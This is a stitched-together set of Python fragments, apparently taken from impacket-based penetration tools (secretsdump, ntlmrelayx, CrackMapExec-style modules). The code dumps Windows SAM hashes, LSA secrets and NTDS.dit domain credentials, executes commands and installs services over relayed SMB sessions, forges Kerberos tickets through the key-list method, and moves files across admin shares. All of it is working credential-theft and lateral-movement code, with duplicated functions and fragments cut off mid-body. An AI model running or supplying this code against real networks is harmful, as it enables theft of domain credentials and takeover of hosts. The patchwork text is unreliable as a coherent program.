#except Exception as e:
#self.logger.error('SAM hashes extraction failed: {}'.format(e))
try:
self.remote_ops.finish()
except Exception as e:
logging.debug("Error calling remote_ops.finish(): {}".format(e))
SAM.finish()
@requires_admin
def lsa(self):
self.enable_remoteops()
def add_lsa_secret(secret):
add_lsa_secret.secrets += 1
self.logger.highlight(secret)
add_lsa_secret.secrets = 0
if self.remote_ops and self.bootkey:
SECURITYFileName = self.remote_ops.saveSECURITY()
LSA = LSASecrets(SECURITYFileName, self.bootkey, self.remote_ops, isRemote=True,
perSecretCallback=lambda secretType, secret: add_lsa_secret(secret))
self.logger.success('Dumping LSA secrets')
LSA.dumpCachedHashes()
LSA.exportCached(self.output_filename)
LSA.dumpSecrets()
LSA.exportSecrets(self.output_filename)
self.logger.success('Dumped {} LSA secrets to {} and {}'.format(highlight(add_lsa_secret.secrets),
self.output_filename + '.secrets', self.output_filename + '.cached'))
try:
self.remote_ops.finish()
except Exception as e:
logging.debug("Error calling remote_ops.finish(): {}".format(e))
LSA.finish()
@requires_admin
def ntds(self):
self.enable_remoteops()
use_vss_method = False
NTDSFileName = None
host_id = self.db.get_computers(filterTerm=self.host)[0][0]
def add_ntds_hash(ntds_hash, host_id):
add_ntds_hash.ntds_hashes += 1
self.logger.highlight(ntds_hash)
if ntds_hash.find('$') == -1:
if ntds_hash.find('\\') != -1:
domain, hash = ntds_hash.split('\\')
else:
domain = self.domain
hash = ntds_hash
try:
username,_,lmhash,nthash,_,_,_ = hash.split(':')
parsed_hash = ':'.join((lmhash, nthash))
if validate_ntlm(parsed_hash):
self.db.add_credential('hash', domain, username, parsed_hash, pillaged_from=host_id)
add_ntds_hash.added_to_db += 1
return
raise
except:
logging.debug("Dumped hash is not NTLM, not adding to db for now ;)")
else:
logging.debug("Dumped hash is a computer account, not adding to db")
add_ntds_hash.ntds_hashes = 0
add_ntds_hash.added_to_db = 0
if self.remote_ops and self.bootkey:
try:
if self.args.ntds == 'vss':
NTDSFileName = self.remote_ops.saveNTDS()
use_vss_method = True
NTDS = NTDSHashes(NTDSFileName, self.bootkey, isRemote=True, history=False, noLMHash=True,
remoteOps=self.remote_ops, useVSSMethod=use_vss_method, justNTLM=False,
pwdLastSet=False, resumeSession=None, outputFileName=self.output_filename,
justUser=None, printUserStatus=False,
perSecretCallback = lambda secretType, secret : add_ntds_hash(secret, host_id))
self.logger.success('Dumping the NTDS, this could take a while so go grab a redbull...')
NTDS.dump()
self.logger.success('Dumped {} NTDS hashes to {} of which {} were added to the database'.format(highlight(add_ntds_hash.ntds_hashes), self.output_filename + '.ntds',
highlight(add_ntds_hash.added_to_db)))
except Exception as e:
#if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# of enough privileges to access DRSUAPI.
# resumeFile = NTDS.getResumeSessionFile()
# if resumeFile is not None:
# os.unlink(resumeFile)
self.logger.error(e)
try:
self.remote_ops.finish()
except Exception as e:
logging.debug("Error calling remote_ops.finish(): {}".format(e))
NTDS.finish()
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
LOG.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port)
#Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection,self.tcpshell.socketfile)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
LOG.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
if self.__SMBConnection.getDialect() == smb.SMB_DIALECT:
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges
if self.config.enumLocalAdmins:
LOG.info("Relayed user doesn't have admin on {}. Attempting to enumerate users who do...".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection)
try:
localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins()
LOG.info("Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
for name in localAdminNames:
LOG.info("Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding), name))
except DCERPCException:
LOG.info("SAMR access denied")
return
# Something else went wrong. aborting
LOG.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(self.config.command)
LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
print(self.__answerTMP.decode(self.config.encoding, 'replace'))
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
LOG.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
LOG.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port)
#Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection, self.tcpshell)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
LOG.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
if self.__SMBConnection.getDialect() == smb.SMB_DIALECT:
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges
if self.config.enumLocalAdmins:
LOG.info("Relayed user doesn't have admin on {}. Attempting to enumerate users who do...".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection)
try:
localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins()
LOG.info("Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
for name in localAdminNames:
LOG.info("Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding), name))
except DCERPCException:
LOG.info("SAMR access denied")
return
# Something else went wrong. aborting
LOG.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(self.config.command)
LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
print(self.__answerTMP.decode(self.config.encoding, 'replace'))
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
LOG.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
def dump(self):
try:
if self.__remoteName.upper() == 'LOCAL' and self.__username == '':
self.__isRemote = False
self.__useVSSMethod = True
if self.__systemHive:
localOperations = LocalOperations(self.__systemHive)
bootKey = localOperations.getBootKey()
if self.__ntdsFile is not None:
# Let's grab target's configuration about LM Hashes storage
self.__noLMHash = localOperations.checkNoLMHashPolicy()
else:
import binascii
bootKey = binascii.unhexlify(self.__bootkey)
else:
self.__isRemote = True
bootKey = None
try:
try:
self.connect()
except Exception as e:
if os.getenv('KRB5CCNAME') is not None and self.__doKerberos is True:
# SMBConnection failed. That might be because there was no way to log into the
# target system. We just have a last resort. Hope we have tickets cached and that they
# will work
logging.debug('SMBConnection didn\'t work, hoping Kerberos will help (%s)' % str(e))
pass
else:
raise
self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost)
self.__remoteOps.setExecMethod(self.__options.exec_method)
if self.__justDC is False and self.__justDCNTLM is False or self.__useVSSMethod is True:
self.__remoteOps.enableRegistry()
bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
except Exception as e:
self.__canProcessSAMLSA = False
if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \
and self.__doKerberos is True:
# Giving some hints here when SPN target name validation is set to something different to Off
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/
logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user')
else:
logging.error('RemoteOperations failed: %s' % str(e))
# If RemoteOperations succeeded, then we can extract SAM and LSA
if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
try:
if self.__isRemote is True:
SAMFileName = self.__remoteOps.saveSAM()
else:
SAMFileName = self.__samHive
self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote)
self.__SAMHashes.dump()
if self.__outputFileName is not None:
self.__SAMHashes.export(self.__outputFileName)
except Exception as e:
logging.error('SAM hashes extraction failed: %s' % str(e))
try:
if self.__isRemote is True:
SECURITYFileName = self.__remoteOps.saveSECURITY()
else:
SECURITYFileName = self.__securityHive
self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps,
isRemote=self.__isRemote, history=self.__history)
self.__LSASecrets.dumpCachedHashes()
if self.__outputFileName is not None:
self.__LSASecrets.exportCached(self.__outputFileName)
self.__LSASecrets.dumpSecrets()
if self.__outputFileName is not None:
self.__LSASecrets.exportSecrets(self.__outputFileName)
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error('LSA hashes extraction failed: %s' % str(e))
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
if self.__isRemote is True:
if self.__useVSSMethod and self.__remoteOps is not None:
NTDSFileName = self.__remoteOps.saveNTDS()
else:
NTDSFileName = None
else:
NTDSFileName = self.__ntdsFile
self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history,
noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,
useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM,
pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,
outputFileName=self.__outputFileName, justUser=self.__justUser,
printUserStatus= self.__printUserStatus)
try:
self.__NTDSHashes.dump()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# of enough privileges to access DRSUAPI.
resumeFile = self.__NTDSHashes.getResumeSessionFile()
if resumeFile is not None:
os.unlink(resumeFile)
logging.error(e)
if self.__justUser and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >=0:
logging.info("You just got that error because there might be some duplicates of the same name. "
"Try specifying the domain name for the user as well. It is important to specify it "
"in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
elif self.__useVSSMethod is False:
logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
self.cleanup()
except (Exception, KeyboardInterrupt) as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(e)
if self.__NTDSHashes is not None:
if isinstance(e, KeyboardInterrupt):
while True:
answer = input("Delete resume session file? [y/N] ")
if answer.upper() == '':
answer = 'N'
break
elif answer.upper() == 'Y':
answer = 'Y'
break
elif answer.upper() == 'N':
answer = 'N'
break
if answer == 'Y':
resumeFile = self.__NTDSHashes.getResumeSessionFile()
if resumeFile is not None:
os.unlink(resumeFile)
try:
self.cleanup()
except:
pass
class KeyListDump:
def __init__(self, remoteName, username, password, domain, options, enum,
targets):
self.__domain = domain
self.__username = username
self.__password = password
self.__aesKey = options.aesKey
self.__doKerberos = options.k
self.__aesKeyRodc = options.rodcKey
self.__remoteName = remoteName
self.__remoteHost = options.target_ip
self.__kdcHost = options.dc_ip
self.__rodc = options.rodcNo
# self.__kvno = 1
self.__enum = enum
self.__targets = targets
self.__full = options.full
self.__smbConnection = None
self.__remoteOps = None
self.__keyListSecrets = None
if options.hashes is not None:
self.__lmhash, self.__nthash = options.hashes.split(':')
else:
self.__lmhash = ''
self.__nthash = ''
def connect(self):
try:
self.__smbConnection = SMBConnection(self.__remoteName,
self.__remoteHost)
if self.__doKerberos:
self.__smbConnection.kerberosLogin(
self.__username, self.__password, self.__domain,
self.__lmhash, self.__nthash, self.__aesKey,
self.__kdcHost)
else:
self.__smbConnection.login(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
except Exception as e:
if os.getenv(
'KRB5CCNAME') is not None and self.__doKerberos is True:
# SMBConnection failed. That might be because there was no way to log into the
# target system. We just have a last resort. Hope we have tickets cached and that they
# will work
logging.debug(
'SMBConnection didn\'t work, hoping Kerberos will help (%s)'
% str(e))
pass
else:
raise
def run(self):
if self.__enum is True:
self.connect()
self.__remoteOps = RemoteOperations(self.__smbConnection,
self.__doKerberos,
self.__kdcHost)
self.__remoteOps.connectSamr(self.__domain)
self.__keyListSecrets = KeyListSecrets(self.__domain,
self.__remoteName,
self.__rodc,
self.__aesKeyRodc,
self.__remoteOps)
logging.info(
'Enumerating target users. This may take a while on large domains'
)
if self.__full is True:
targetList = self.getAllDomainUsers()
else:
targetList = self.__keyListSecrets.getAllowedUsersToReplicate()
else:
logging.info('Using target users provided by parameter')
self.__keyListSecrets = KeyListSecrets(self.__domain,
self.__remoteName,
self.__rodc,
self.__aesKeyRodc, None)
targetList = self.__targets
logging.info('Dumping Domain Credentials (domain\\uid:[rid]:nthash)')
logging.info(
'Using the KERB-KEY-LIST request method. Tickets everywhere!')
for targetUser in targetList:
user = targetUser.split(":")[0]
targetUserName = Principal(
'%s' % user,
type=constants.PrincipalNameType.NT_PRINCIPAL.value)
partialTGT, sessionKey = self.__keyListSecrets.createPartialTGT(
targetUserName)
fullTGT = self.__keyListSecrets.getFullTGT(targetUserName,
partialTGT, sessionKey)
if fullTGT is not None:
key = self.__keyListSecrets.getKey(fullTGT, sessionKey)
print(self.__domain + "\\" + targetUser + ":" + key[2:])
def getAllDomainUsers(self):
resp = self.__remoteOps.getDomainUsers()
# Users not allowed to replicate passwords by default
deniedUsers = [500, 501, 502, 503]
targetList = []
for user in resp['Buffer']['Buffer']:
if user['RelativeId'] not in deniedUsers and "krbtgt_" not in user[
'Name']:
targetList.append(user['Name'] + ":" + str(user['RelativeId']))
return targetList
class DumpSecrets:
def __init__(self,
remote_name,
username="",
password="",
domain="",
options=None):
self.__use_VSS_method = options.use_vss
self.__remote_name = remote_name
self.__remote_host = options.target_ip
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ""
self.__nthash = ""
self.__smb_connection = None
self.__remote_ops = None
self.__SAM_hashes = None
self.__NTDS_hashes = None
self.__LSA_secrets = None
self.__system_hive = options.system
self.__bootkey = options.bootkey
self.__security_hive = options.security
self.__sam_hive = options.sam
self.__ntds_file = options.ntds
self.__no_lmhash = options.no_lmhash
self.__is_remote = options.is_remote
self.__do_kerberos = options.k
self.__just_DC = options.just_dc
self.__just_DC_NTLM = options.just_dc_ntlm
self.__can_process_SAM_LSA = options.can_process_SAM_LSA
self.__kdc_host = options.dc_ip
self.__options = options
if options.hashes is not None:
self.__lmhash, self.__nthash = options.hashes.split(":")
def connect(self):
self.__smb_connection = SMBConnection(self.__remote_name,
self.__remote_host)
self.__smb_connection.login(
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
)
def dump(self): # noqa: C901
with StdoutCapture() as output_captor:
dumped_secrets = ""
try:
if self.__remote_name.upper(
) == "LOCAL" and self.__username == "":
self.__is_remote = False
self.__use_VSS_method = True
if self.__system_hive:
local_operations = LocalOperations(self.__system_hive)
bootkey = local_operations.getBootKey()
if self.__ntds_file is not None:
# Let's grab target's configuration about LM Hashes storage.
self.__no_lmhash = local_operations.checkNoLMHashPolicy(
)
else:
import binascii
bootkey = binascii.unhexlify(self.__bootkey)
else:
self.__is_remote = True
bootkey = None
try:
try:
self.connect()
except Exception as e:
if os.getenv(
"KRB5CCNAME"
) is not None and self.__do_kerberos is True:
# SMBConnection failed. That might be because there was no way to
# log into the
# target system. We just have a last resort. Hope we have tickets
# cached and that they
# will work
logger.debug(
"SMBConnection didn't work, hoping Kerberos will help (%s)"
% str(e))
else:
raise
self.__remote_ops = RemoteOperations(
self.__smb_connection, self.__do_kerberos,
self.__kdc_host)
self.__remote_ops.setExecMethod(
self.__options.exec_method)
if (self.__just_DC is False
and self.__just_DC_NTLM is False
or self.__use_VSS_method is True):
self.__remote_ops.enableRegistry()
bootkey = self.__remote_ops.getBootKey()
# Let's check whether target system stores LM Hashes.
self.__no_lmhash = self.__remote_ops.checkNoLMHashPolicy(
)
except Exception as e:
self.__can_process_SAM_LSA = False
if (str(e).find("STATUS_USER_SESSION_DELETED")
and os.getenv("KRB5CCNAME") is not None
and self.__do_kerberos is True):
# Giving some hints here when SPN target name validation is set to
# something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs
# different to cifs/.
logger.error(
"Policy SPN target name validation might be restricting full "
"DRSUAPI dump." + "Try -just-dc-user")
else:
logger.error("RemoteOperations failed: %s" %
str(e))
# If RemoteOperations succeeded, then we can extract SAM and LSA.
if (self.__just_DC is False and self.__just_DC_NTLM is False
and self.__can_process_SAM_LSA):
try:
if self.__is_remote is True:
SAM_file_name = self.__remote_ops.saveSAM()
else:
SAM_file_name = self.__sam_hive
self.__SAM_hashes = SAMHashes(
SAM_file_name, bootkey, isRemote=self.__is_remote)
self.__SAM_hashes.dump()
except Exception as e:
logger.error("SAM hashes extraction failed: %s" %
str(e))
try:
if self.__is_remote is True:
SECURITY_file_name = self.__remote_ops.saveSECURITY(
)
else:
SECURITY_file_name = self.__security_hive
self.__LSA_secrets = LSASecrets(
SECURITY_file_name,
bootkey,
self.__remote_ops,
isRemote=self.__is_remote,
)
self.__LSA_secrets.dumpCachedHashes()
self.__LSA_secrets.dumpSecrets()
except Exception as e:
logger.debug(traceback.print_exc())
logger.error("LSA hashes extraction failed: %s" %
str(e))
# NTDS Extraction we can try regardless of RemoteOperations failing. It might
# still work.
if self.__is_remote is True:
if self.__use_VSS_method and self.__remote_ops is not None:
NTDS_file_name = self.__remote_ops.saveNTDS()
else:
NTDS_file_name = None
else:
NTDS_file_name = self.__ntds_file
self.__NTDS_hashes = NTDSHashes(
NTDS_file_name,
bootkey,
isRemote=self.__is_remote,
noLMHash=self.__no_lmhash,
remoteOps=self.__remote_ops,
useVSSMethod=self.__use_VSS_method,
justNTLM=self.__just_DC_NTLM,
)
try:
self.__NTDS_hashes.dump()
except Exception as e:
logger.debug(traceback.print_exc())
if str(e).find("ERROR_DS_DRA_BAD_DN") >= 0:
# We don't store the resume file if this error happened, since this error
# is related to lack
# of enough privileges to access DRSUAPI.
resume_file = self.__NTDS_hashes.getResumeSessionFile()
if resume_file is not None:
os.unlink(resume_file)
logger.error(e)
if self.__use_VSS_method is False:
logger.error(
"Something wen't wrong with the DRSUAPI approach. Try again with "
"-use-vss parameter")
self.cleanup()
except (Exception, KeyboardInterrupt) as e:
logger.debug(traceback.print_exc())
logger.error(e)
if self.__NTDS_hashes is not None:
if isinstance(e, KeyboardInterrupt):
resume_file = self.__NTDS_hashes.getResumeSessionFile()
if resume_file is not None:
os.unlink(resume_file)
try:
self.cleanup()
except Exception:
pass
finally:
dumped_secrets = (output_captor.get_captured_stdout_output()
) # includes hashes and kerberos keys
return dumped_secrets
def cleanup(self):
logger.debug("Cleaning up...")
if self.__remote_ops:
self.__remote_ops.finish()
if self.__SAM_hashes:
self.__SAM_hashes.finish()
if self.__LSA_secrets:
self.__LSA_secrets.finish()
if self.__NTDS_hashes:
self.__NTDS_hashes.finish()
class SmbCon(Connector):
def __init__(self, args, loggers, host, db):
Connector.__init__(self, args, loggers, host)
self.auth = False
self.con = False
self.client = ''.join(
[choice(ascii_letters + digits) for x in range(7)])
self.smbv1 = False
self.os = ''
self.admin = False
self.signing = False
self.os_arch = '0'
self.remote_ops = None
self.bootkey = None
self.db = db
self.port = 445
#########################
# Session Management
#########################
def create_smb_con(self):
# Create SMB Con
if self.smb_connection():
self.host_info()
try:
# SMB Auth
self.con.login(self.username,
self.password,
self.domain,
lmhash=self.lmhash,
nthash=self.nthash)
self.auth = True
self.host_info()
self.isAdmin()
self.update_db()
except Exception as e:
raise Exception(str(e))
else:
raise Exception('Connection to Server Failed')
def update_db(self):
self.db.update_host(self.host, self.ip, self.domain, self.os,
self.signing)
if self.username and self.password or self.username and self.hash:
self.db.update_user(self.username, self.password, self.domain,
self.hash)
if self.admin:
self.db.update_admin(self.username, self.domain, self.host)
def logoff(self):
self.con.logoff()
def close(self):
try:
self.con.logoff()
except:
pass
try:
self.con.close()
except:
pass
#########################
# SMB Connection
#########################
def smb_connection(self):
if self.smbv1_con():
return True
elif self.smbv3_con():
return True
return False
def smbv1_con(self):
try:
self.con = SMBConnection(self.client,
self.host,
sess_port=self.port,
preferredDialect=SMB_DIALECT,
timeout=int(self.timeout))
self.smbv1 = True
self.con.setTimeout(self.timeout)
return True
except Exception as e:
return False
def smbv3_con(self):
try:
self.con = SMBConnection(self.client,
self.host,
sess_port=self.port,
timeout=int(self.timeout))
self.con.setTimeout(self.timeout)
return True
except Exception as e:
return False
#########################
# Authentication (NOT IN USE)
#########################
def set_host(self, local_auth):
# Get domain for authentication purposes
if local_auth:
self.domain = self.con.getServerName(
) + "." + self.con.getServerDNSDomainName()
else:
self.domain = self.con.getServerDNSDomainName()
# Backup for Linux/Unix systems
if not self.domain:
self.domain = self.con.getServerName(
) + "." + self.con.getServerDNSDomainName()
################################
# Enumerate Host information
################################
def host_info(self):
try:
self.srvdomain = self.get_domain()
self.host = self.get_hostname()
self.os = self.con.getServerOS()
self.signing = self.con.isSigningRequired()
arch = self.get_os_arch()
if arch == 32 or arch == 64:
self.os_arch = " x{}".format(str(arch))
else:
self.os_arch = ''
except Exception as e:
self.logger.debug("SMB Host Info: {}".format(str(e)))
def get_os_arch(self):
# Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(
MSRPC_UUID_PORTMAP,
transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36',
'1.0'))
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except:
return 0
def get_hostname(self):
if self.con.getServerDNSDomainName() and not self.local_auth:
if self.con.getServerName().lower(
) != self.con.getServerDNSDomainName().lower():
return (self.con.getServerName() + "." +
self.con.getServerDNSDomainName())
else:
return self.con.getServerName()
else:
return self.con.getServerName()
def get_domain(self):
try:
return self.con.getServerDomain()
except:
return self.getServerName()
def list_shares(self):
# name=share['shi1_netname'][:-1], description=share['shi1_remark']
return self.con.listShares()
################################
# Host/Domain Password Policy
################################
def password_policy(self):
SAMRDump(self).dump(self.host)
################################
# List Shares & Check Share Permissions
################################
def read_perm(self, share):
try:
# Silently list path to check access
self.list_path(share, False)
return True
except:
return False
def write_perm(self, share):
try:
# Create dir to check write access
tmp = '.' + ''.join(
[choice(ascii_letters + digits) for x in range(5)])
self.con.createDirectory(share, tmp)
self.con.deleteDirectory(share, tmp)
return True
except Exception as e:
return False
def list_path(self, share, path):
if not path:
path = '/*'
return self.con.listPath(share, path)
################################
# Check if User Admin
################################
def isAdmin(self):
rpctransport = SMBTransport(self.host,
self.port,
r'\svcctl',
smb_connection=self.con)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except:
pass
else:
dce.bind(scmr.MSRPC_UUID_SCMR)
try:
# 0xF003F - SC_MANAGER_ALL_ACCESS
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
ans = scmr.hROpenSCManagerW(dce, '{}\x00'.format(self.host),
'ServicesActive\x00', 0xF003F)
self.admin = True
return True
except scmr.DCERPCException as e:
pass
return False
################################
# Dump SAM / LSA
# Methods were modified from:
# https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
################################
def enable_remoteops(self):
if self.remote_ops is not None and self.bootkey is not None:
return
try:
self.remote_ops = RemoteOperations(self.con, False, None)
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.fail('RemoteOperations failed for {}: {}'.format(
self.host, str(e)))
def sam(self):
def add_sam_hash(sam_hash, host):
self.logger.success([self.host, self.ip, "SAM HASH", sam_hash])
username, _, lmhash, nthash, _, _, _ = sam_hash.split(':')
self.db.update_user(username, '', host,
"{}:{}".format(lmhash, nthash))
add_sam_hash.added_to_db += 1
try:
add_sam_hash.added_to_db = 0
self.enable_remoteops()
if self.remote_ops and self.bootkey:
SAMFileName = self.remote_ops.saveSAM()
SAM = SAMHashes(SAMFileName,
self.bootkey,
isRemote=True,
perSecretCallback=lambda secret: add_sam_hash(
secret, self.host))
SAM.dump()
except Exception as e:
self.logger.debug('SAM Extraction Failed for {}: {}'.format(
self.host, str(e)))
if add_sam_hash.added_to_db > 0:
self.logger.success([
self.host, self.ip, "SAM HASH",
'{} NTLM hashes added to the database'.format(
add_sam_hash.added_to_db)
])
try:
self.remote_ops.finish()
SAM.finish()
except Exception as e:
self.logger.debug(
["SAM", "Error calling remote_ops.finish(): {}".format(e)])
def ntds(self):
def add_ntds_hash(ntds_hash):
if ntds_hash.find('$') == -1:
if "CLEARTEXT" in ntds_hash:
try:
add_ntds_hash.clear_text += 1
username, password = ntds_hash.split(":CLEARTEXT:")
domain, username = username.split("\\")
self.db.update_user(username, '', domain, password)
add_ntds_hash.added_to_db += 1
except:
self.logger.fail(
"Error adding clear text cred to db: {}".format(
ntds_hash))
else:
if ntds_hash.find('\\') != -1:
domain, hash = ntds_hash.split('\\')
else:
domain = self.domain
hash = ntds_hash
try:
username, _, lmhash, nthash, _, _, _ = hash.split(':')
parsed_hash = ':'.join((lmhash, nthash))
if validate_ntlm(parsed_hash):
add_ntds_hash.ntds_hashes += 1
self.db.update_user(username, '', domain,
"{}:{}".format(lmhash, nthash))
add_ntds_hash.added_to_db += 1
except:
self.logger.debug(
"Skipping non-NTLM hash: {}".format(ntds_hash))
else:
self.logger.debug("Skipping computer account")
try:
self.enable_remoteops()
use_vss_method = self.args.use_vss
NTDSFileName = None
add_ntds_hash.ntds_hashes = 0
add_ntds_hash.clear_text = 0
add_ntds_hash.added_to_db = 0
outfile = os.path.join(os.path.expanduser('~'), '.ar3',
'workspaces', self.args.workspace,
self.domain)
if self.remote_ops and self.bootkey:
if self.args.ntds is 'vss':
NTDSFileName = self.remote_ops.saveNTDS()
use_vss_method = True
NTDS = NTDSHashes(NTDSFileName,
self.bootkey,
isRemote=True,
history=False,
noLMHash=True,
remoteOps=self.remote_ops,
useVSSMethod=use_vss_method,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName=outfile,
justUser=None,
printUserStatus=False,
perSecretCallback=lambda secretType, secret:
add_ntds_hash(secret))
self.logger.info([
self.host, self.ip, "NTDS",
'Dumping NTDS.dit, this could take a minute'
])
NTDS.dump()
self.logger.success([
self.host, self.ip, "NTDS",
'{} NTLM hashes and {} clear text passwords collected'.
format(add_ntds_hash.ntds_hashes, add_ntds_hash.clear_text)
])
self.logger.success([
self.host, self.ip, "NTDS",
'{} creds added to the database'.format(
add_ntds_hash.added_to_db)
])
self.logger.info([
self.host, self.ip, "NTDS",
'Hash files located at: {}'.format(outfile)
])
else:
raise Exception("RemoteOps and BootKey not initiated")
except Exception as e:
self.logger.fail('NTDS Extraction Failed for {}: {}'.format(
self.host, str(e)))
try:
self.remote_ops.finish()
NTDS.finish()
except Exception as e:
self.logger.debug(
["NTDS", "Error calling remote_ops.finish(): {}".format(e)])
################################
# File Interaction
################################
def createFile(self, filename, data, share='C$'):
# Create new file & write data, Not In Use
f = remotefile.RemoteFile(self.con, filename, share)
f.create()
f.write(data)
f.close()
def uploadFile(self, local_file, location, share='C$'):
f = open(local_file)
self.con.putFile(share, location, f.read)
f.close()
def downloadFile(self, remote_file, location='ar3_download', share='C$'):
f = open(location, 'wb')
self.con.getFile(share, remote_file, f.write)
f.close()
return
